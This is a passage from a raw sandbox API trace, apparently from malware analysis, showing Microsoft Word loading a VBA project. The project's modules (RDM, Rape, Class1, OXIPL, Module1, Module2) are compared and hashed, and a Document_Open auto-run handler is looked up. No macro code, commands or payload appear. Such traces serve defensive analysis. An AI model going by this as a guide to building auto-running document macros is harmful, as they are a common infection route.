_SizeOfElements=0x8, _PtFuncCompare=0x7fee379ce28 | out: _Base=0x76db300) [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="RDM", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Rape", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Class1", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="OXIPL", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module2", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="RDM", cchCount1=-1, lpString2="Module2", cchCount2=-1) returned 3 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Rape", cchCount1=-1, lpString2="RDM", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Class1", cchCount1=-1, lpString2="RDM", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="OXIPL", cchCount1=-1, lpString2="RDM", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="RDM", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="Module2", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Rape", cchCount1=-1, lpString2="Module2", cchCount2=-1) returned 3 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Class1", cchCount1=-1, lpString2="Rape", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="OXIPL", cchCount1=-1, lpString2="Rape", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="Module2", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="OXIPL", cchCount1=-1, lpString2="Module2", cchCount2=-1) returned 3 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Class1", cchCount1=-1, lpString2="OXIPL", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="Module2", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Class1", cchCount1=-1, lpString2="Module2", cchCount2=-1) returned 1 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="Class1", cchCount2=-1) returned 3 [0030.505] bsearch (_Key=0x2e6838, _Base=0x76db300, _NumOfElements=0x7, _SizeOfElements=0x8, _PtFuncCompare=0x7fee379ce28) returned 0x76db330 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisDocument", cchCount1=-1, lpString2="OXIPL", cchCount2=-1) returned 3 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisDocument", cchCount1=-1, lpString2="RDM", cchCount2=-1) returned 3 [0030.505] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="ThisDocument", cchCount1=-1, lpString2="ThisDocument", cchCount2=-1) returned 2 [0030.516] IUnknown:AddRef (This=0x782a220) returned 0x4 [0030.516] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="VBA", cchCount1=3, lpString2="Normal", cchCount2=6) returned 3 [0030.516] IUnknown:AddRef (This=0x731da90) returned 0x8 [0030.516] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Word", cchCount1=4, lpString2="Normal", cchCount2=6) returned 3 [0030.516] IUnknown:AddRef (This=0x731cc80) returned 0x6 [0030.516] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="stdole", cchCount1=6, lpString2="Normal", cchCount2=6) returned 3 [0030.516] wcsncpy_s (in: _Destination=0x2e7230, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0030.516] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0030.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2e7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0030.516] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0030.516] SysStringByteLen (bstr="潎浲污") returned 0x6 [0030.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x76676e8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0030.516] SysStringByteLen (bstr="潎浲污") returned 0x6 [0030.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x76676e8, cbMultiByte=7, lpWideCharStr=0x7667f28, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0030.517] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="Normal", cchCount1=6, lpString2="Normal", cchCount2=6) returned 2 [0030.517] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.518] IMalloc:Free (This=0x7fefe015380, pv=0x76d95c0) [0030.534] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0030.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x76676e8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0030.534] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0030.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x76676e8, cbMultiByte=8, lpWideCharStr=0x7667f28, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0030.534] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0030.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x76676e8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0030.534] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0030.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x76676e8, cbMultiByte=8, lpWideCharStr=0x7667e38, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0030.534] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x2e7630, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0030.534] lstrlenA (lpString="Project") returned 7 [0030.534] IMalloc:Alloc (This=0x7fefe015380, cb=0xa8) returned 0xb4c7440 [0030.534] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76d95c0 [0030.535] IMalloc:Alloc (This=0x7fefe015380, cb=0x60) returned 0x7773d60 [0030.539] IMalloc:Alloc (This=0x7fefe015380, cb=0xa8) returned 0xb4c74f0 [0030.539] IMalloc:Alloc (This=0x7fefe015380, cb=0x30) returned 0x76db140 [0030.546] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RDM", cchWideChar=4, lpMultiByteStr=0x2e7880, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDM", lpUsedDefaultChar=0x0) returned 4 [0030.546] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="RDM") returned 0x10cde9 [0030.546] bsearch (_Key=0x2e67d8, _Base=0x76db300, _NumOfElements=0x7, _SizeOfElements=0x8, _PtFuncCompare=0x7fee379ce28) returned 0x76db328 [0030.546] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="RDM", cchCount1=-1, lpString2="OXIPL", cchCount2=-1) returned 3 [0030.546] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="RDM", cchCount1=-1, lpString2="RDM", cchCount2=-1) returned 2 [0030.547] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Rape") returned 0x1009d7 [0030.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Rape", cchWideChar=5, lpMultiByteStr=0x2e7880, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rape", lpUsedDefaultChar=0x0) returned 5 [0030.547] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Rape") returned 0x1009d7 [0030.547] bsearch (_Key=0x2e67d8, _Base=0x76db300, _NumOfElements=0x7, _SizeOfElements=0x8, _PtFuncCompare=0x7fee379ce28) returned 0x76db320 [0030.547] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Rape", cchCount1=-1, lpString2="OXIPL", cchCount2=-1) returned 3 [0030.547] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Rape", cchCount1=-1, lpString2="RDM", cchCount2=-1) returned 1 [0030.547] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Rape", cchCount1=-1, lpString2="Rape", cchCount2=-1) returned 2 [0030.547] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Class1") returned 0x102b7f [0030.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Class1", cchWideChar=7, lpMultiByteStr=0x2e7880, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Class1", lpUsedDefaultChar=0x0) returned 7 [0030.547] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Class1") returned 0x102b7f [0030.547] bsearch (_Key=0x2e67d8, _Base=0x76db300, _NumOfElements=0x7, _SizeOfElements=0x8, _PtFuncCompare=0x7fee379ce28) returned 0x76db300 [0030.547] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Class1", cchCount1=-1, lpString2="OXIPL", cchCount2=-1) returned 1 [0030.547] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Class1", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 1 [0030.547] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Class1", cchCount1=-1, lpString2="Class1", cchCount2=-1) returned 2 [0030.547] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OXIPL", cchWideChar=6, lpMultiByteStr=0x2e7880, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OXIPL", lpUsedDefaultChar=0x0) returned 6 [0030.547] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="OXIPL") returned 0x100035 [0030.547] bsearch (_Key=0x2e67d8, _Base=0x76db300, _NumOfElements=0x7, _SizeOfElements=0x8, _PtFuncCompare=0x7fee379ce28) returned 0x76db318 [0030.547] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="OXIPL", cchCount1=-1, lpString2="OXIPL", cchCount2=-1) returned 2 [0030.547] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module1") returned 0x101162 [0030.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module1", cchWideChar=8, lpMultiByteStr=0x2e7880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module1", lpUsedDefaultChar=0x0) returned 8 [0030.548] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Module1") returned 0x101162 [0030.548] bsearch (_Key=0x2e67d8, _Base=0x76db300, _NumOfElements=0x7, _SizeOfElements=0x8, _PtFuncCompare=0x7fee379ce28) returned 0x76db308 [0030.548] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="OXIPL", cchCount2=-1) returned 1 [0030.548] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module1", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 2 [0030.548] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Module2") returned 0x101163 [0030.548] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Module2", cchWideChar=8, lpMultiByteStr=0x2e7880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Module2", lpUsedDefaultChar=0x0) returned 8 [0030.548] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Module2") returned 0x101163 [0030.548] bsearch (_Key=0x2e67d8, _Base=0x76db300, _NumOfElements=0x7, _SizeOfElements=0x8, _PtFuncCompare=0x7fee379ce28) returned 0x76db310 [0030.548] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module2", cchCount1=-1, lpString2="OXIPL", cchCount2=-1) returned 1 [0030.548] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module2", cchCount1=-1, lpString2="Module1", cchCount2=-1) returned 3 [0030.548] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="Module2", cchCount1=-1, lpString2="Module2", cchCount2=-1) returned 2 [0030.575] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6250 [0030.575] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e70a0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.575] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e70a0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.598] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.599] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document_Open") returned 0x1089c1 [0030.599] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6250 [0030.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e6ac0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.616] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e6ac0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.625] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="095b6852dd", cchWideChar=11, lpMultiByteStr=0x2e6dd0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="095b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.626] GetLocalTime (in: lpSystemTime=0x2e6eb8 | out: lpSystemTime=0x2e6eb8*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x208)) [0030.626] _ultow_s (in: _Value=0x5b6852dd, _Buffer=0xb52c4c4, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852dd") returned 0x0 [0030.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0:5b6852dd", cchWideChar=11, lpMultiByteStr=0x2e6e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0:5b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e6c50, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.626] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e6870, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.626] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e6870, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.632] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.633] IMalloc:Alloc (This=0x7fefe015380, cb=0x14) returned 0xb490d10 [0030.633] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838740 [0030.633] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51db80 [0030.633] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51e0c0 [0030.633] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0x78039f0 [0030.633] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0x7803c40 [0030.633] IMalloc:Alloc (This=0x7fefe015380, cb=0x50) returned 0x7809900 [0030.633] IUnknown:AddRef (This=0x782a220) returned 0x4 [0030.633] strcpy_s (in: _Dst=0x78031d0, _DstSize=0x43, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0030.633] strcpy_s (in: _Dst=0x7803220, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0030.633] IUnknown:AddRef (This=0x731da90) returned 0xa [0030.633] strcpy_s (in: _Dst=0x7803290, _DstSize=0x3b, _Src="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Dst="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0030.634] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb4fefb0 [0030.634] strcpy_s (in: _Dst=0xb4fefd8, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0030.634] IUnknown:AddRef (This=0x731cc80) returned 0x6 [0030.634] strcpy_s (in: _Dst=0xb4ff048, _DstSize=0x20, _Src="C:\\Windows\\system32\\stdole2.tlb" | out: _Dst="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0030.634] strcpy_s (in: _Dst=0xb4ff070, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0030.634] IUnknown:AddRef (This=0x7829f50) returned 0x3 [0030.635] strcpy_s (in: _Dst=0xb4ff0e0, _DstSize=0x40, _Src="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Dst="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0030.635] strcpy_s (in: _Dst=0xb4ff128, _DstSize=0x7, _Src="Office" | out: _Dst="Office") returned 0x0 [0030.636] IMalloc:Alloc (This=0x7fefe015380, cb=0x118) returned 0xb48c280 [0030.636] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb4ff200 [0030.636] IMalloc:Alloc (This=0x7fefe015380, cb=0xe08) returned 0xb50b2f0 [0030.637] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490d30 [0030.637] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490c70 [0030.637] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490d50 [0030.637] strcpy_s (in: _Dst=0xb4ff258, _DstSize=0x9, _Src="Document" | out: _Dst="Document") returned 0x0 [0030.637] IMalloc:Alloc (This=0x7fefe015380, cb=0xc8) returned 0x765af10 [0030.638] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb4ff450 [0030.638] IMalloc:Alloc (This=0x7fefe015380, cb=0x14) returned 0xb490cd0 [0030.638] IMalloc:Free (This=0x7fefe015380, pv=0xb490cd0) [0030.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e70a0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.638] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e70a0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.644] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.644] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document_Open") returned 0x1089c1 [0030.644] IMalloc:Alloc (This=0x7fefe015380, cb=0x18) returned 0xb490cd0 [0030.644] IMalloc:Free (This=0x7fefe015380, pv=0xb490cd0) [0030.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e71c0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.644] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e71c0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.650] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.650] IMalloc:Alloc (This=0x7fefe015380, cb=0xc0) returned 0x765afe0 [0030.650] IMalloc:GetSize (This=0x7fefe015380, pv=0x765afe0) returned 0xc0 [0030.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="015b6852dd", cchWideChar=11, lpMultiByteStr=0x2e74d0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="015b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.669] GetLocalTime (in: lpSystemTime=0x2e75b8 | out: lpSystemTime=0x2e75b8*(wYear=0x7e1, wMonth=0x8, wDayOfWeek=0x4, wDay=0x11, wHour=0xd, wMinute=0x35, wSecond=0x21, wMilliseconds=0x237)) [0030.669] _ultow_s (in: _Value=0x5b6852dd, _Buffer=0xb4c6424, _BufferCount=0x9, _Radix=16 | out: _Buffer="5b6852dd") returned 0x0 [0030.669] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0;5b6852dd", cchWideChar=11, lpMultiByteStr=0x2e7510, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0;5b6852dd", lpUsedDefaultChar=0x0) returned 11 [0030.669] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x78388f0 [0030.669] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51ddc0 [0030.669] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51e000 [0030.669] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb4ff6a0 [0030.670] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb4ff8f0 [0030.670] IMalloc:Alloc (This=0x7fefe015380, cb=0x810) returned 0xb50c100 [0030.670] IMalloc:Free (This=0x7fefe015380, pv=0xb50c100) [0030.670] IMalloc:Alloc (This=0x7fefe015380, cb=0x60) returned 0x7773eb0 [0030.670] IMalloc:GetSize (This=0x7fefe015380, pv=0x7773eb0) returned 0x60 [0030.670] IMalloc:Free (This=0x7fefe015380, pv=0x7773eb0) [0030.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=13, lpMultiByteStr=0x2e7350, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 13 [0030.670] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ThisDocument") returned 0x109e3c [0030.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e6f70, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.670] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x2e6f70, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0030.675] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0030.675] IMalloc:Alloc (This=0x7fefe015380, cb=0xd0) returned 0xb4244d0 [0030.675] IMalloc:Alloc (This=0x7fefe015380, cb=0xb8) returned 0xb51e180 [0030.675] IMalloc:Alloc (This=0x7fefe015380, cb=0x3d0) returned 0xb524640 [0030.675] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x7667800 [0030.675] IMalloc:Alloc (This=0x7fefe015380, cb=0x10) returned 0xb490cd0 [0030.675] IMalloc:Alloc (This=0x7fefe015380, cb=0x80) returned 0x7838980 [0030.675] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6250 [0030.676] IMalloc:Alloc (This=0x7fefe015380, cb=0x0) returned 0xb4f6220 [0030.676] IUnknown:AddRef (This=0x782a220) returned 0x5 [0030.676] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db580 [0030.676] IUnknown:AddRef (This=0x731da90) returned 0xd [0030.676] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db200 [0030.676] IUnknown:AddRef (This=0x731cc80) returned 0x7 [0030.676] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db180 [0030.676] wcsncpy_s (in: _Destination=0x2e6cf0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0030.676] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0030.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2e6c20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0030.676] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0030.691] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e3850 [0030.691] IUnknown:AddRef (This=0x7829f50) returned 0x4 [0030.691] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db540 [0030.691] IUnknown:AddRef (This=0x782b300) returned 0x2 [0030.692] IMalloc:Alloc (This=0x7fefe015380, cb=0x38) returned 0x76db340 [0030.692] IMalloc:Alloc (This=0x7fefe015380, cb=0x40) returned 0xb4e38a0 [0030.692] LHashValOfNameSysA (syskind=0x3, lcid=0x409, 